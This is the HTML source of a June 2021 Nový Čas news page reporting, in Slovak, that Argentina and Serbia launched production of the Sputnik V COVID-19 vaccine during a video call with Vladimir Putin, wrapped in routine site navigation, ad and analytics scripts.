
<!DOCTYPE html>
<!--[if lt IE 7 ]>
<html lang="sk" class="no-responsive ie6"><![endif]-->
<!--[if IE 7 ]>
<html lang="sk" class="no-responsive ie7"><![endif]-->
<!--[if IE 8 ]>
<html lang="sk" class="no-responsive ie8"><![endif]-->
<!--[if IE 9 ]>
<html lang="sk" class="ie9"><![endif]-->
<!--[if (gt IE 9)|!(IE)]><!-->
<html lang="sk">
<!--<![endif]-->

<head>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
	<meta name="revisit-after" content="1 days">
	<meta name="author" content="Cas.sk">
	<meta name="copyright" content="FPD Media, a.s.">
	<meta property="article:author" content="https://www.facebook.com/novycas">
	<meta property="article:publisher" content="https://www.facebook.com/novycas">
	<meta name="viewport" id="viewport"
		content="width=device-width, initial-scale=1, maximum-scale=2.0, user-scalable=yes">
	<meta property="fb:pages" content="143523195682500">
	<meta property="og:site_name" content="Nový Čas">
	<meta property="og:type" content="website">

	<link rel="image_src" href="https://cdn.cas.sk/cas/img/svg/logo_cas.svg">
	<link rel="manifest" href="https://cdn.cas.sk/cas/css/build/manifest.json">
	<link href="https://cdn.cas.sk/cas/img/favicon/favicon-196.png" rel="shortcut icon" type="image/x-icon">
	<link rel="apple-touch-icon" href="https://cdn.cas.sk/cas/img/favicon/favicon-196.png">
	<script id="facebook-jssdk" src="//connect.facebook.net/sk_SK/sdk.js"></script>
	<script async="async" defer="defer"
		src="https://cdn.cas.sk/cas/js/vendor/gemius/current.js?v=3.1406eb7e5"></script>
	<script type="text/javascript"
		src="https://cdn.cas.sk/cas/js/build/bundle.js?v=49d8b5fb99adb42718ec2778f53b21ea"></script>
	<link rel="stylesheet" type="text/css" charset="utf-8"
		href="https://cdn.cas.sk/cas/css/build/bundle.css?v=56b9e18f5db05811d8076aedaf9d85a5">
	<script>
		var viewport = document.getElementById('viewport')['content'];
		if (typeof viewport == 'string') {
			//iphone 6 plus
			if (navigator.userAgent.search(/iPhone/) != -1 && (window.screen.width == 736 || window.screen.width == 414)) {
				document.getElementById('viewport')['content'] = document.getElementById('viewport')['content'].replace("initial-scale=1", "initial-scale=0.8");
			}
		}
	</script>

		<script src="https://www.google.com/recaptcha/api.js"></script>

		<link href="https://fonts.googleapis.com/css?family=PT+Sans+Narrow:700&amp;subset=latin,latin-ext" rel="stylesheet"
			type="text/css">

		<script>
			var viewport = document.getElementById('viewport')['content'];
			if (typeof viewport == 'string') {
				//iphone 6 plus
				if (navigator.userAgent.search(/iPhone/) != -1 && (window.screen.width == 736 || window.screen.width == 414)) {
					document.getElementById('viewport')['content'] = document.getElementById('viewport')['content'].replace("initial-scale=1", "initial-scale=0.8");
				}
			}
		</script>

	<link rel="stylesheet" type="text/css" charset="utf-8" href="https://cdn.cas.sk/cas/css/cas.css">
	<script src="https://beacon.s-onetag.com/beacon.min.js"></script>
	<script type="text/javascript"
		src="https://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=5394x"></script>
	<script type="text/javascript" src="https://cdn.predpovede.topky.sk/widget/js/z-predpovede-widget.min.js"></script>
<title>Argentína a Srbsko spustili výrobu vakcíny Sputnik V: Odštartovali ju počas videohovoru s Putinom | Nový Čas</title>
<meta property="og:title" content="Argentína a Srbsko spustili výrobu vakcíny Sputnik V: Odštartovali ju počas videohovoru s Putinom">
<meta name="description" content="Argentína a Srbsko v piatok oficiálne spustili priemyselnú výrobu ruskej vakcíny Sputnik V proti chorobe COVID-19.">

<meta property="og:description" content="Argentína a Srbsko v piatok oficiálne spustili priemyselnú výrobu ruskej vakcíny Sputnik V proti chorobe COVID-19.">    <meta property="og:image" content="https://img.cas.sk/cas/1280px-c1/3330441.jpg"/>
<meta property="og:url" content="https://www.cas.sk/clanok/2537973/">
<link rel="canonical" href="https://www.cas.sk/clanok/2537973/argentina-a-srbsko-spustili-vyrobu-vakciny-sputnik-v-odstartovali-ju-pocas-videohovoru-s-putinom/" />

<meta property="article:published_time" content="2021-06-04">
<meta property="article:modified_time" content="2021-06-04">
    <meta name="news_keywords" content="koronavírus, covid19, vakcína, výroba, spustenie, Rusko, prezident, covid-19, Srbsko, Vladimir Putin, prezidenti, očkovanie, Argentína, vakcíny">
<script src="https://connect.facebook.net/sk_SK/sdk.js?hash=bed8128c48a712a7b4639d9d6e4cf248&amp;ua=modern_es6"
    async="" crossorigin="anonymous"></script>

<script src="https://cdn.cas.sk/cas/js/lib/vue.js"></script>
<script async='async' src='https://www.googletagservices.com/tag/js/gpt.js'></script>
<script type='text/javascript'>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</script><!-- Begin Next Millennium -->
<script async src="https://powerad.ai/script.js"></script>
<!-- End Next Millennium -->

<script src="https://publisher.caroda.io/videoPlayer/caroda.min.js?ctok=0e02ed5f40604175" crossorigin="anonymous" defer></script><!-- Strossle SDK -->
    <script>
        window.strossle=window.strossle||function(){(strossle.q=strossle.q||[]).push(arguments)};
        strossle('c112cf7b-dc8d-40d0-a23f-7bff94b74496', '.strossle-widget');
    </script>
<script async src="https://assets.strossle.com/strossle-widget-sdk/1/strossle-widget-sdk.js"></script>
<!-- End Strossle SDK --><script src='https://sk.search.etargetnet.com/gdpr/gdpr.js.php?ecmp=18'></script><style>
img[src*="?x"] {width:100%}
</style>
		<!-- Google Tag Manager -->
		<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
		new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
		j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
		'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
		})(window,document,'script','dataLayer','GTM-K8P67VC');</script>
		<!-- End Google Tag Manager -->
	</head>

	<body>			<script type="text/javascript">
				// counter
				var ts = (new Date()).getTime();
				var c = document.createElement('img');
				c.setAttribute('src', '/counter.fcgi?id=2537973&ts='+ts);
				c.setAttribute('class', 'img-counter');
				document.body.appendChild(c);
				</script>		<!-- Google Tag Manager (noscript) -->
		<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-K8P67VC"
		height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
		<!-- End Google Tag Manager (noscript) -->

		<script type="text/javascript">
			var pp_gemius_identifier = 'ofTgxLcZo4lqngX8Bxr5wfWorfFRtad4UoMVyDanuvf.q7';
			// lines below shouldn't be edited
			function gemius_pending(i) { window[i] = window[i] || function () { var x = window[i + '_pdata'] = window[i + '_pdata'] || []; x[x.length] = arguments; }; };
			gemius_pending('gemius_hit'); gemius_pending('gemius_event'); gemius_pending('pp_gemius_hit'); gemius_pending('pp_gemius_event');
			(function (d, t) {
				try {
					var gt = d.createElement(t), s = d.getElementsByTagName(t)[0], l = 'http' + ((location.protocol == 'https:') ? 's' : ''); gt.setAttribute('async', 'async');
					gt.setAttribute('defer', 'defer'); gt.src = l + '://gemius.zoznam.sk/xgemius.js'; s.parentNode.insertBefore(gt, s);
				} catch (e) { }
			})(document, 'script');
		</script>
		<script>
			(function (i, s, o, g, r, a, m) {
				i['GoogleAnalyticsObject'] = r; i[r] = i[r] || function () {
					(i[r].q = i[r].q || []).push(arguments)
				}, i[r].l = 1 * new Date(); a = s.createElement(o),
					m = s.getElementsByTagName(o)[0]; a.async = 1; a.src = g; m.parentNode.insertBefore(a, m)
			})(window, document, 'script', '//www.google-analytics.com/analytics.js', 'ga');

			ga('create', 'UA-81288614-1', 'auto');
			if (window.innerWidth < 480) {
				ga('create', 'UA-36979262-1', 'auto', { 'name': 'newTracker' });
			} ga('set', 'contentGroup1', 'zahranicne-spravy');  ga('set', 'contentGroup2', 'koronavirus');  ga('set', 'contentGroup3', 'clanok');  ga('set', 'contentGroup5', 'tasr'); 
			ga('send', 'pageview');
			if (window.innerWidth < 480) {
							ga('newTracker.send', 'pageview'); // Send page view for new tracker.
						}
		</script>

		<script type="text/javascript">
			var __contentVersion = $('body').responsive().getViewVersion();
			var __cas = new Cas();
			__lazyImageImmediate = __cas.setLazyImageImediate;
			__viewType = (__contentVersion <= 480) ? 'mobile' : 'desktop';
			__hideVideoAd = (__contentVersion <= 480);
			$(function () {
				Tracker.first('clanok');
				__cas.init();
				__cas.setHpMoreUrl('https://www.cas.sk/hp-load-more/');
				__cas.setSearchMoreUrl('https://www.cas.sk/search-load-more/');
				__tracker = new GlobalTracker();
			});
		</script>
		<script>
			window.fbAsyncInit = function () {
				FB.init({
					appId: '1486365238262284',
					xfbml: true,
					version: 'v2.5'
				});
			};

			(function (d, s, id) {
				var js, fjs = d.getElementsByTagName(s)[0];
				if (d.getElementById(id)) { return; }
				js = d.createElement(s); js.id = id;
				js.src = "//connect.facebook.net/sk_SK/sdk.js";
				fjs.parentNode.insertBefore(js, fjs);
			}(document, 'script', 'facebook-jssdk'));
		</script>

		<script>
			if (typeof RSWebPush != 'undefined') {
					window.RSWebPush.setConfig({
						'serviceWorkerUrl': '/worker-service-rs_base-push_service_worker.js',
						'registerSubscribeUrl': '/MagazinesApi/registerEndpoint/',
						'unregisterSubscribeUrl': '/MagazinesApi/unregisterEndpoint/',
						'log': false
					});
					window.RSWebPush.init();
				}
		</script>

		<div id="page">
			<div>					<div class="slide-menu" id="slide-menu">

						<div class="slide-menu-top">

							<div class="logo">
								<a href="/" class="rs-logo rs-logo-novy-cas-45 md-visible"
									data-event="clanok|slide-menu|"></a>
								<a href="/" class="rs-logo rs-logo-novy-cas-65 sm-visible"
									data-event="clanok|slide-menu|"></a>
								<a href="/" class="rs-logo rs-logo-novy-cas-65 xs-visible"
									data-event="clanok|slide-menu|"></a>
							</div>
							<div class="name">Sobota&nbsp;5. 6.<br>
								<a data-event="clanok|slide-menu|meno-kalendar"
									href="https://calendar.zoznam.sk/meno/Laura">Laura</a>
							</div>

							<div class="menu-icon hidden xs-visible" id="side-menu-main-menu-toggler">
								<div class="icon-menu"></div>
							</div>

						</div>
						<div id="weather-mobile-widget"></div>

						<div class="slide-menu-content">
							<div class="slide-menu-items cloneable" data-clone-target="#main-menu"></div>
							<form onsubmit="return __cas.checkEmptySearch($(this))" class="slide-menu-search-wrapper" method="get" action="/vyhladavanie/">
							  <div class="search-input-wrapper">
								<input type="text" name="q" placeholder="Vyhľadaj" onclick="this.select();">
							  </div>
							  <div class="search-submit-bg">
								<div class="icon-search"></div>
							  </div>
							  <input data-event="hp|slide-menu|vyhladavanie" class="search-submit" type="submit" value="">
							</form>
							<div class="divider mt-md-30 mb-md-30 mt-sm-30 mb-sm-30 mb-xs-30 mt-xs-30"></div>
							<div class="slide-menu-tip">
							  <span class="slide-menu-tip-title">Vaše tipy</span>
							  <span class="slide-menu-tip-text">Máte tip na článok, zaujímavé fotografie alebo video? Pošlite nám ich!</span>
							  <a href="/tipredakcii/" class="slide-menu-tip-button">Poslať tip</a>
							</div>

							<div class="slide-menu-issue">							</div>
						</div>

					</div>

					<div class="page-container">
						<!-- Header --><header>        <div class="main-logo">    <div class="main-logo-wrapper">
        <a href="/" class="rs-logo rs-logo-novy-cas-100 lg-visible"
            data-event="clanok|hlavicka|logo-cas" title="Čas.sk - Hlavná stránka">Nový čas</a>
        <a href="/" class="rs-logo rs-logo-novy-cas-95 md-visible"
            data-event="clanok|hlavicka|logo-cas" title="Čas.sk - Hlavná stránka"></a>
        <a href="/" class="rs-logo rs-logo-novy-cas-85 sm-visible"
            data-event="clanok|hlavicka|logo-cas" title="Čas.sk - Hlavná stránka"></a>
        <a href="/" class="rs-logo rs-logo-novy-cas-65 xs-visible"
            data-event="clanok|hlavicka|logo-cas" title="Čas.sk - Hlavná stránka"></a>
    </div>        </div>
    <nav class="menu-container">

        <div class="menu-wrapper">

<menu class="" id="main-menu">			<a href="/spravy/koronavirus/"  title="Koronavírus"  data-event="hp|hlavicka|hlavne-menu-">Koronavírus</a>			<a href="/spravy/" class="menu-item" title="Správy"  data-event="hp|hlavicka|hlavne-menu-">Správy</a>			<a href="/prominenti/"  title="Prominenti"  data-event="hp|hlavicka|hlavne-menu-">Prominenti</a>			<a href="/sport/" class="menu-item" title="Šport"  data-event="hp|hlavicka|hlavne-menu-">Šport</a>			<a href="/sport/hokej/ms-hokej-2021/"  title="MS v hokeji 2021"  data-event="hp|hlavicka|hlavne-menu-">MS v hokeji 2021</a>			<a href="/tip-od-vas/" class="menu-item" title="Tip od Vás"  data-event="hp|hlavicka|hlavne-menu-">Tip od Vás</a>			<a  href="/prominenti/prominenti-kucherenko/" title="Kucherenko"  data-event="hp|hlavicka|hlavne-menu-">Kucherenko			</a>			<a onclick="trackOutbound(this, 'MENU', 'Tivi - Menu');" href="https://tivi.cas.sk/" title="TIVI.SK"  data-event="hp|hlavicka|hlavne-menu-">TIVI.SK			</a>			<a  href="/horoskopy/" title="Horoskop"  data-event="hp|hlavicka|hlavne-menu-">Horoskop			</a>			<a  href="/aktualne-titulky/" title="Titulka"  data-event="hp|hlavicka|hlavne-menu-">Titulka			</a>			<a  href="/spravy/europa/" title="Európa"  data-event="hp|hlavicka|hlavne-menu-">Európa			</a></menu>

            <div class="hidden lg-visible search-box">
                <div class="search-box-wrapper">
                    <div class="search-box-toggle" id="search-box-toggle">
                        <div class="icon-search"></div>
                    </div>
                    <div class="search-box-form" id="search-box-form">
                        <form onsubmit="return __cas.checkEmptySearch($(this))" method="get"
                            action="/vyhladavanie/">
                            <div class="search-box-form-left" id="search-box-toggle-close">
                                <span class="icon-close"></span>
                            </div>
                            <div class="search-box-form-center">
                                <input class="search-box-input" type="text" name="q" placeholder="Vyhľadaj"
                                    onclick="this.select();">
                            </div>
                            <div class="search-box-form-right">
                                <input data-event="clanok|hlavicka|search" class="search-box-submit"
                                    name="sn" type="submit" value="">
                            </div>
                            <input type="hidden" name="hash" value="b5f1cddf5a3">
                        </form>
                    </div>
                </div>
            </div>

            <div class="menu-additional">

                <div class="date fleft">Sobota&nbsp;5. 6.
                </div>

                <div class="divider fleft">|</div>

                <div class="nameday fleft">
                    <a title="Dnes má meniny Laura" data-event="clanok|hlavicka|meniny"
                        href="https://calendar.zoznam.sk/meno/Laura">Laura</a>
                </div>


                <div class="divider fleft">|</div>
                <div id="weather-widget"></div>
<script>

var widget = window.zPredpovedeWidget({
    cookie: {
        domain: ".cas.sk"
    }
});
widget.push("#weather-widget",
    '<div class="weather fleft">' +
        '<div class="weather-icon fleft">' +
            '<div class="relative weather-img-small ib" title="%WEATHER_TITLE%">' +
                 '<img src="%WEATHER_IMAGE%">' +
            '</div>' +
        '</div>' +
        '<a class="link" href="%WEATHER_LINK%" title="%WEATHER_TITLE%"' +
            'data-event="clanok|hlavicka|pocasie-aktuality">' +
            '<span class="temperature fleft">%WEATHER_TEMPERATURE%</span>' +
        '</a>' +
        '%WEATHER_CITY_SELECT%' +
    '</div>'
);

widget.push("#weather-mobile-widget",
    '<div class="slide-menu-weather">' +
        '<a class="link" href="%WEATHER_LINK%" title="%WEATHER_TITLE%"' +
            'data-event="clanok|hlavicka|pocasie-aktuality">' +
            '<span class="temperature fleft">%WEATHER_TEMPERATURE%  %WEATHER_TITLE%</span>' +
        '</a>' +
        ' | %WEATHER_CITY_SELECT%' +
    '</div>'
);

widget.run();
</script>
                <div class="tip">
                    <a class="tip-logo" href="/tipredakcii/" title="Tip od Vás | Nový Čas">
                        <img src="https://cdn.cas.sk/cas/img/flag_tipodvas.png" alt="Tip od Vás"
                            title="Tip od Vás | Nový Čas">
                    </a>
                    <a class="tip-text" href="/tipredakcii/" title="Tip od Vás | Nový Čas">
                        <span class="cas-color-font">Máte tip?</span> <br> Pošlite nám ho!
                    </a>
                </div>

                <div class="menu_advertisement">
                    <div class="rs-advertisement rs-advertisement-cas-desktop-banner-logo">
                        <!-- Reklamna plocha cas-desktop-banner-logo -->
                        <!-- Neexistuje -->
                    </div>
                </div>

            </div>

            <div class="slide-menu-icon hidden md-visible sm-visible xs-visible" id="main-menu-toggler">
                <span class="hamburger icon icon-menu"></span>
            </div>

        </div>

    </nav>

</header>
						<!-- Header end -->

						<div style="width: 100%; height: 0px; margin: 0 auto; background: #000; margin-top: 10px;"></div>
<div class="rs-advertisement rs-advertisement-cas-desktop-screen-top">
  <!-- Reklamna plocha cas-desktop-screen-top -->
  <style>#div-gpt-ad-cas-desktop-screen-top > div:first-child { padding: 10px 0; }</style>
  <div id="div-gpt-ad-cas-desktop-screen-top" style="text-align: center; width: 100%; box-sizing: border-box;">
    <div id='top1'>
      <script>
        googletag.cmd.push(function() { googletag.display('top1'); });
      </script>
    </div>
  </div>
</div><div class="rs-advertisement rs-advertisement-cas-desktop-square">
<div id='m_top1' style="text-align: center; width: 100%; padding: 10px 0;">
  <script>
    googletag.cmd.push(function() { googletag.display('m_top1'); });
  </script>
</div>
</div>					</div>				<div class="page-container"><div id="compact-menu" class="style-white">
	<div class="logo-wrap">
		<a href="/" class="rs-logo rs-logo-novy-cas-35"  data-event="clanok|lista-biela|lista-biela-logo" ></a>
	</div>
	<div class="social header-social">		<a class="fb fb-cnt btn-a sm-hidden xs-hidden" href="#"  data-event="clanok|lista-biela|lista-biela-share" onclick="__cas.trackSocialButtons('facebook','zdielat-hlavicka' )" data-href="https://www.facebook.com/sharer.php?u=https://www.cas.sk/clanok/2537973/argentina-a-srbsko-spustili-vyrobu-vakciny-sputnik-v-odstartovali-ju-pocas-videohovoru-s-putinom/" data-url="https://www.cas.sk/clanok/2537973/argentina-a-srbsko-spustili-vyrobu-vakciny-sputnik-v-odstartovali-ju-pocas-videohovoru-s-putinom/" data-share-count="0">
			<span class="">Zdieľaj</span>
		</a>
		<a class="fb-icon md-hidden lg-hidden"
		   href="https://www.facebook.com/sharer.php?u=https://www.cas.sk/clanok/2537973/"  data-event="clanok|lista-biela|facebook" data-url="https://www.cas.sk/clanok/2537973/argentina-a-srbsko-spustili-vyrobu-vakciny-sputnik-v-odstartovali-ju-pocas-videohovoru-s-putinom/" data-share-count="0" target="_blank">
		</a>
			<a class="btn-a white-btn diss icon-diss "  data-event="clanok|lista-biela|lista-biela-diskusia" title="Diskusia | Nový Čas" href="/diskusia/2537973/argentina-a-srbsko-spustili-vyrobu-vakciny-sputnik-v-odstartovali-ju-pocas-videohovoru-s-putinom/">
				<span class="text-diss">
					<span class="button-title sm-hidden xs-hidden">Diskusia</span>
					<span class="slash sm-hidden xs-hidden"> / </span>
					<span class="cnt disqus-comment-count" data-disqus-identifier="2537973"></span>
				</span>
			</a>			<div id="button_webpush_5dced80a350d8" class="button-webpush"></div>
			<script type="text/javascript">
				if(typeof RSWebPush != 'undefined') {
					RSWebPush.addReadyListener(function () {
						(new window.BtnWebPush($('#button_webpush_5dced80a350d8')[0])).init('Vypnúť upozornenia');
					});
				}
			</script>	</div>
	<script type="text/javascript">
		$(function () {
			$(__cas.handleSocial());
		});
	</script>
</div>
<script type="text/javascript">
	$(__cas.handleCompactMenu() );
</script>
<div class="article-container">
    <article id="float5dced80a34cd7">
        <div class="article-wrapper">
<div class="date-categories">Včera 22:59		<span class="sep">|</span>
		<a class="breadcrumb" href="/spravy/" title="Správy" data-event="clanok|cesticka|Správy">Správy</a>		<span class="sep">|</span>
		<a class="breadcrumb" href="/spravy/zahranicne-spravy/" title="Zahraničné správy" data-event="clanok|cesticka|Zahraničné správy">Zahraničné správy</a></div>    <div class="flags">    </div>
<h1 class="mt-lg-10">Argentína a Srbsko spustili výrobu vakcíny Sputnik V: Odštartovali ju počas videohovoru s Putinom</h1>
<div class="cb"></div>
<div class="mt20 social-tip">        <div class="share-facebook-twitter-button">            <a href="http://www.facebook.com/sharer.php?u=https://www.cas.sk/clanok/2537973/"
            data-url="https://www.cas.sk/clanok/2537973/argentina-a-srbsko-spustili-vyrobu-vakciny-sputnik-v-odstartovali-ju-pocas-videohovoru-s-putinom/"
            class="fb-button" data-event="clanok|funkcne-prvky|fb-share-pod-nadpisom">
                <span class="full-width">Zdieľaj na Facebooku</span>
                <span class="mobile-width">Zdieľaj</span>
            </a>
            <div style="clear: both"></div>
        </div>        <a data-event="clanok|funkcne-prvky|diskusia-pod-nadpisom" class="article-discussion-button"
           href="/diskusia/2537973/argentina-a-srbsko-spustili-vyrobu-vakciny-sputnik-v-odstartovali-ju-pocas-videohovoru-s-putinom/"
           title="Diskusia | Nový Čas">
            <span class="button-title">Diskusia / </span>
            <span class="count disqus-comment-count" data-disqus-identifier="2537973"></span>
        </a>
        <div id="button_webpush_5dced80a3547c" class="button-webpush"></div>
        <script type="text/javascript">
            if(typeof RSWebPush != 'undefined') {
                RSWebPush.addReadyListener(function () {
                    (new window.BtnWebPush($('#button_webpush_5dced80a3547c')[0])).init('');
                });
            }
        </script>    <div class="tip">
        <a data-event="clanok|funkcne-prvky|mate-tip-pod-nadpisom" class="md-visible sm-visible lg-visible"
           href="/tipredakcii/" title="Máte tip? Dajte nám vedieť.">
            <span class="cas-color-font font-pt-sans-bold">Máte tip?</span>
            <span class="underline">Dajte nám vedieť</span></a>
        <a data-event="clanok|funkcne-prvky|mate-tip-pod-nadpisom" class="xs-visible" href="/tipredakcii/">
            <span class="cas-color-font font-pt-sans-bold" title="Máte tip? Dajte nám vedieť.">Máte tip?</span>
        </a>
    </div>
    <div class="cb"></div>
</div>
<div class="mt20 ">        <div class="main-image relative">
            <div class="article-image">
                <span class="imgwrapper">                        <a data-event="clanok|funkcne-prvky|galeria-obrazok" title="Argentína a Srbsko spustili výrobu vakcíny Sputnik V: Odštartovali ju počas videohovoru s Putinom"        href="/fotogaleria/2536537/argentina-a-srbsko-spustili-vyrobu-vakciny-sputnik-v-odstartovali-ju-pocas-videohovoru-s-putinom/1/" class="img">                        <img id=img-2537973 class="immediate_lazy_load" src=""
                             data-1024="https://img.cas.sk/cas/1280px-c2/3330441.jpg"
                             data-1024x2="https://img.cas.sk/cas/1280px-c2/3330441.jpg"
                             title="Argentína a Srbsko spustili výrobu vakcíny Sputnik V: Odštartovali ju počas videohovoru s Putinom | Nový Čas" alt="Argentína a Srbsko spustili výrobu vakcíny Sputnik V: Odštartovali ju počas videohovoru s Putinom"
                             itemprop="image"><noscript><img
                            src="https://img.cas.sk/cas/1280px-c2/3330441.jpg"></noscript><script>if( typeof __lazyImageImmediate == "function" ){__lazyImageImmediate("#img-2537973")}</script>                        <span class="info-layer">
                            <span class="cnt">1</span>
                            <span class="cnt-text">Galéria &gt;</span>
                        </span>
                        <span class="article-photo-hover">Otvoriť galériu</span>
                        </a>                    <div class="info-wrapper">
                        <a data-event="clanok|funkcne-prvky|galeria-nadpis"        href="/fotogaleria/2536537/argentina-a-srbsko-spustili-vyrobu-vakciny-sputnik-v-odstartovali-ju-pocas-videohovoru-s-putinom/1/" class="titlewrapper" title="Ruská vakcína vyrobená v Argentíne a Srbsku uspokojí najskôr potreby domáceho trhu.">Ruská vakcína vyrobená v Argentíne a Srbsku uspokojí najskôr potreby domáceho trhu.                        </a>                            <div class="img-source">Zdroj: tasr ap</div>                        <div class="tiny-clear"></div>
                    </div>
                </span>
            </div>
        </div></div>
<div class="article-content ">
    <div class="introtext mt20" itemprop="description">Argentína a Srbsko v piatok oficiálne spustili priemyselnú výrobu ruskej vakcíny Sputnik V proti chorobe COVID-19.    </div>

    <div itemprop="articleBody" class="fulltext mt20" id="ga-article-event"><p>Informovala o tom ruská štátna televízna stanica Rossija 24. Výrobu v oboch krajinách symbolicky, spolu s miestnym prezidentom, spúšťal prostredníctvom videohovoru vysielaného v televízii aj ruský prezident Vladimir Putin, dodala agentúra Reuters.</p>

<p><strong>Ruská vakcína vyrobená v Argentíne a Srbsku uspokojí najskôr potreby domáceho trhu. </strong>Predpokladá sa, že vyvážať sa bude v neskoršej fáze, uviedol vo svojom vyhlásení Ruský fond priamych investícií (RFPI), ktorý vakcínu uvádza na trh. <strong>V Srbsku sa Sputnik V bude vyrábať v Inštitúte pre virológiu, vakcíny a séra Torlak v Belehrade.</strong></p>

<p>Ako spresnila agentúra Tanjug, prezident Vladimir Putin a jeho srbský kolega Aleksandar Vučič spustili výrobu symbolicky prostredníctvom videokonferencie. Výrobnú linku priamo na mieste spustila riaditeľka belehradského inštitútu Vera Stoiljkovičová.</p><div id="videoad">
					<script>
					googletag.cmd.push(function() { googletag.display("videoad"); });
					</script>
				</div>
				<div class="rs-advertisement rs-advertisement-cas-desktop-square-inline">
					<div id="m_mid2">
					<script>
						googletag.cmd.push(function() { googletag.display("m_mid2"); });
					</script>
					</div>
				</div>

<p>Vo svojom krátkom príhovore pripomenula, že Srbsko bude prvou krajinou v Európe, ktorá začne vyrábať ruskú vakcínu. <strong>&quot;Srbsko bolo jednou z prvých krajín v Európe, kde sa očkovalo vakcínou Sputnik V. Dnes je Srbsko lídrom v Európe, pokiaľ ide o počet zaočkovaných občanov,&quot;</strong> uviedla s tým, že zaočkovaných je viac ako 30 percent dospelých obyvateľov Srbska, čo je &quot;dvakrát viac ako európsky priemer&quot;.
<div class="article-object article-object-linked">
    <div class="img">
        <a data-event="clanok|linkovany-clanok|clanok-obrazok" href="https://www.cas.sk/clanok/2537969/medzinarodna-iniciativa-nema-dostatok-vakcin-rozvojove-krajiny-nebudu-zaockovane-vcas/"
           title="Medzinárodná iniciatíva nemá dostatok vakcín: Rozvojové krajiny nebudú zaočkované včas">
            <img class="lazy_load"
                 src="https://img.cas.sk/cas/320px-c1/3330435.jpg"
                 data-1024="https://img.cas.sk/cas/320px-c1/3330435.jpg"
                 data-1024x2="https://img.cas.sk/cas/320px-c1/3330435.jpg"
                 title="Hospital COVID | Nový Čas"
                 alt="Hospital COVID"
                 style="display: none;">
            <noscript>
                <img src="https://img.cas.sk/cas/320px-c1/3330435.jpg">
            </noscript>
        </a>
    </div>
    <div class="text pt-lg-25 pb-lg-25 pr-lg-25 pt-md-25 pb-md-25 pr-md-25 pt-sm-25 pb-sm-25 pr-sm-25">
        <h2 class="font-pt-serif-bold">
            <a data-event="clanok|linkovany-clanok|clanok-nadpis" href="https://www.cas.sk/clanok/2537969/medzinarodna-iniciativa-nema-dostatok-vakcin-rozvojove-krajiny-nebudu-zaockovane-vcas/">Medzinárodná iniciatíva nemá dostatok vakcín: Rozvojové krajiny nebudú zaočkované včas            </a>
        </h2>
    </div>
</div><strong>Spočiatku, počas nasledujúcich štyroch až šiestich mesiacov, bude Torlakov inštitút vyrábať štyri milióny dávok vakcíny Sputnik V.</strong> Očakáva sa, že prvá várka očkovacej látky vyrobená v tomto inštitúte sa do očkovacích centier dostane asi o desať dní.</p>

<p>Výroba vakcíny Sputnik V sa začala v piatok aj v Argentíne, informovala agentúra Interfax. Predpokladá sa, že do konca tohto roka sa v Argentíne vyrobí 100 miliónov dávok ruskej vakcíny.</p>

<p>Vakcína Sputnik V, vyvinutá ruským Gamalejovým štátnym výskumným centrom epidemiológie a mikrobiológie, je registrovaná v 66 krajinách a momentálne je v procese postupného preskúmavania Svetovou zdravotníckou organizáciou (WHO) i Európskou agentúrou pre lieky (EMA).
<div class="article-object article-object-linked">
    <div class="img">
        <a data-event="clanok|linkovany-clanok|clanok-obrazok" href="https://www.cas.sk/clanok/2537947/k-nasim-susedom-dorazila-z-madarska-naloz-vakcin-cesko-prislubilo-ze-ich-neskor-vrati/"
           title="K našim susedom dorazila z Maďarska nálož vakcín: Česko prisľúbilo, že ich neskôr vráti">
            <img class="lazy_load"
                 src="https://img.cas.sk/cas/320px-c1/3330381.jpg"
                 data-1024="https://img.cas.sk/cas/320px-c1/3330381.jpg"
                 data-1024x2="https://img.cas.sk/cas/320px-c1/3330381.jpg"
                 title="Vakcíny proti koronavírusovej chorobe COVID-19 od firiem Pfizer a BioNTech určené na distribúciu. | Nový Čas"
                 alt="Vakcíny proti koronavírusovej chorobe COVID-19 od firiem Pfizer a BioNTech určené na distribúciu."
                 style="display: none;">
            <noscript>
                <img src="https://img.cas.sk/cas/320px-c1/3330381.jpg">
            </noscript>
        </a>
    </div>
    <div class="text pt-lg-25 pb-lg-25 pr-lg-25 pt-md-25 pb-md-25 pr-md-25 pt-sm-25 pb-sm-25 pr-sm-25">
        <h2 class="font-pt-serif-bold">
            <a data-event="clanok|linkovany-clanok|clanok-nadpis" href="https://www.cas.sk/clanok/2537947/k-nasim-susedom-dorazila-z-madarska-naloz-vakcin-cesko-prislubilo-ze-ich-neskor-vrati/">K našim susedom dorazila z Maďarska nálož vakcín: Česko prisľúbilo, že ich neskôr vráti            </a>
        </h2>
    </div>
</div></p>
    </div>
    <script>
        var _ArticleGaEvent = new ArticleGaEvent();
        _ArticleGaEvent.articleId = 2537973;
        _ArticleGaEvent.init('ga-article-event');
    </script>
    <div class="mt20">            <div class="share-facebook-twitter-button ">                <a href="http://www.facebook.com/sharer.php?u=https://www.cas.sk/clanok/2537973/"
                data-url="https://www.cas.sk/clanok/2537973/argentina-a-srbsko-spustili-vyrobu-vakciny-sputnik-v-odstartovali-ju-pocas-videohovoru-s-putinom/"
                class="fb-button" data-event="clanok|funkcne-prvky|fb-share-pod-clankom">
                    <span class="full-width">Zdieľaj na Facebooku</span>
                    <span class="mobile-width">Zdieľaj</span>
                </a>
                <div style="clear: both"></div>
            </div>            <a data-event="clanok|funkcne-prvky|diskusia-pod-clankom" class="article-discussion-button"
               href="/diskusia/2537973/argentina-a-srbsko-spustili-vyrobu-vakciny-sputnik-v-odstartovali-ju-pocas-videohovoru-s-putinom/"
               title="Diskusia | Nový Čas">
                <span class="button-title">Diskusia / </span>
                <span class="count disqus-comment-count" data-disqus-identifier="2537973"></span>
                <script id="dsq-count-scr" src="//cas-sk.disqus.com/count.js" async=""></script>
            </a>
            <div id="button_webpush_5dced80a35a0a" class="button-webpush"></div>
            <script type="text/javascript">
                if(typeof RSWebPush != 'undefined') {
                    RSWebPush.addReadyListener(function () {
                        (new window.BtnWebPush($('#button_webpush_5dced80a35a0a')[0])).init('');
                    });
                }

